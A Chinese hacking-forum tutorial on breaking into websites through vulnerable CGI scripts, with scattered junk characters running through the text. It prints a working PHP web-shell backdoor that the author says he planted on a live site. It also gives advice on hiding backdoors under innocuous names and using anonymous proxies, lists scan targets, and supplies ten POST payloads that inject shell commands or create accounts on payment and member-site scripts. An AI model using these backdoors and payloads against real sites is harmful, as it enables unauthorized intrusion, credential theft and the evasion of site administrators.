CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
大家好 我是bboyhip  只是一名菜菜的exploiter
很开心来到贵论坛
这里让我感觉 很有技术交流的感觉
我会长长来玩的
前言:
以下讲解针对欧美日本网站
當我們在做滲透分析的時候 方法有很多
/ o! G/ D8 `& R3 Y6 U我门都知道 国外伺服器大多是linux 平台
所以有很多网站程序有6成都会使用cgi 脚本来管理
目录为/cgi-bin/

* L, [* Y. u% _, Q! I  |* v. e只是个人在实务上一些经验
写的不好 请多多见谅喔
在这里我简单分为几个部份一定要會的
讲解一下
让没有基础的人很容易上手
/ G' i1 {- e$ G/ N6 t! j
3 V8 I" A2 G7 o+ l+ e! I' i以下内容跟帖回复才能看到
==============================
  x5 r  @' V0 y* s, H: ]
第1部份: 何谓Shell?
- U1 a1 p% A, H9 n7 c0 D+ ~Shell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
A shell is the program which reads user input from the command line and executes actions based upon that input.
意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.
3 q- w; T. u, R& l* b6 }: l4 j
& s8 ]; F9 P3 n9 [9 p6 ~对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
. ^; K! e4 X, |( z) N& v8 m/ r" _8 z所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.
4 B" s! O- ?. `, N& a# w. ?
" ~, a3 ?* O  V& |" A  o第2部份: Unix 指令
3 h3 A( [$ B2 E0 y) u: ?5 ]% u  f4 y以下是一些常见及重要的指令:
$ p2 ]' t5 Z1 j: |, |pwd: 显示当前目录, 即是後门/程式所在的位置
8 H& f7 }3 x2 x+ }2 k6 t' n- s如 /home/www/site.com/cgi-bin/
$ ?& X' M4 d1 M6 k, rls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
ls -al :详细列出档案资料(当前目录)
- D3 f* A6 [5 M; Z. h1 rls /: 列出根目录
ls /etc: 列出/etc的资料夹及档案
ls ../ -al: 详细列出上一层的资料夹及档案
" k( t" l) J; Zcat: 显示档案内容
9 R$ p( `8 y3 @! ^! lcat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
2 k+ M. m# |+ }' ~9 r: |% a; xcat /etc/passwd: 显示 /etc/passwd 这个档案的内容
& @* u9 V9 q  a+ z. }, m* @who: 显示谁login 至系统
/ y; D# I6 [) j& Xman: 显示指令用法  
man ls: 显示ls这指令的用法  
; V9 r9 r, u* z9 q1 w% T7 Jmkdir 建立目录
! @9 ~/ {5 r0 k; u  G, Rrmdir 删除目录
mv 移动档案
rm 删除档案

第3部份: Shell的使用
例如:
, E/ @1 s+ [5 E- v! Ihttp://site.com/refer.php
+ @+ k5 h" B  w2 d这是我的後门, 原代码如下:
* l& Z3 k0 V3 E$ ~: h, H) e2 }, j<Form Action="#" Method="POST">
5 h% Y/ K; U; l, ~- T<Input type="text" name="cmd">
<Input type="Submit">
</Form>
<?php
$cmd = $_POST['cmd'];
$Output = shell_exec($cmd);
echo $Output;
" k* U. L# h& t8 X% T' i/ I?>
输入pwd, 可得到绝对路径:
/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com
0 b" v; k; M8 K2 z0 E3 m
第4部份: 注意事项
- 使用匿名代理, 保障自己
6 f5 U5 @9 _1 X2 [2 f+ o- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
3 s7 p0 b2 m, R% }# ^% q( T; i- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
) h- p' Z( ~! O8 d* B0 ?! b: ?- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
/ Q) w- x2 m- M- v- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
! V: q% q6 v& {# S7 g不容易被发现.
- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
4 m" U; q9 |/ Q. {) P& N针对网站的渗透分析方法太多了
这篇文章的重点是cgi 脚本攻击
. R7 l# c2 v( n8 n所以我用简单的叙述形容
开始讲解脚本入侵过程:
+ ?9 \* |- |9 Z2 S0 n$ r在这里提供一些方法思路让大家学习一下
/ f0 V9 i7 ~. C# b( u( |+ E
1.一开始对一个网站进行cgi漏洞扫描
( s1 I) I' w) Q5 `6 \我们需要的东西有
9 @$ I8 R+ V% L/ S" W扫洞工具 如:triton..等等
E表
如
7 l% ~4 Z% W: P6 T7 I8 R/cgi-bin/add-passwd.cgi
; I8 w$ U, Y! K; K% a- e/WebShop/templates/cc.txt
% L) w) @3 t1 {; s" C, O, e( R/Admin_files/order.log
  Y. k* M' s& n$ r/orders/mountain.cfg
6 P% v6 H- j5 f5 k4 x/cgi-sys/cart.pl
% u) Q( c1 H- L" O5 \+ L) J' j/scripts/cart.pl
( @5 w5 Y. \9 ~$ c/htbin/cart.pl
E表来源可以是网路收寻或是自己的0 day

) _& @8 l1 i, g  c! `' @- \2.怎样确认扫到的洞 是真的还假的?
1 S4 o" {! Q2 g. O$ i8 S! U! F. J举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
) |6 ~7 H" A0 {# R9 h( q. Q* D一般都是在IE里先看一下的,记住这个返回码哦
+ C  L- m; T" Q7 fERROR:This script should be referenced with a METHOD of POST.
没有返回一定是假的
8 n: r6 X+ @' K! f/ y- k: B3.重来来了 很多人都会问我
% i! X' n5 l/ P% q他扫到很多洞 但是不会使用
因为这些漏洞 使用的语法 称为post
/ Q' A# ^- C+ c我们要找post 的方法很多
& A# }# v% C9 G5 ]2 H可以是源代码分析 找出介质
或是用抓包工具 抓他的语法...等等
( h3 |" x- \& _! }' v6 l# O. P
# U4 C2 H  A# P" x" N& n8 a% r以下我提供10个 cgi 洞以及使用方法post
/ K6 P5 o0 @- }6 s* H7 l+ E; C让大家可以针对网站去做扫描  
+ {8 h* f% F3 O4 Q6 S' @& J# ^/index.cgi
wei=ren&gen=command
# t' \' |+ }6 v1 Z/passmaster.cgi
! V0 W& r9 D0 K/ ?5 Q  }Action=Add&Username=Username&Password=Password
& p" P* s) k$ D. U6 y6 A9 }) e/accountcreate.cgi
8 o% s4 d) ]: ousername=username&password=password&ref1=|echo;ls|
; t) ]5 j4 H8 d  m7 R( I: F/form.cgi
& I0 J0 p2 }6 b& }name=xxxx&email=email&subject=xxxx&response=|echo;ls|
  e: b* ]* }2 k/ ^2 G2 R/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
( P( P& F$ I. K2 W0 w# X) T/ccbill-local.asp
post_values=username:password
, l7 S% i4 G: X/count.cgi
pinfile=|echo;ls -la;exit|
/recon.cgi
/recon.cgi?search
$ \. B' m' n& h+ v/ Wsearchoption=1&searchfor=|echo;ls -al;exit|
/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
3 K* ^0 ?  U$ B' v8 Y( u9 y' b/af.cgi_browser_out=|echo;ls -la;exit;|

今天就讲到这  感谢大家支持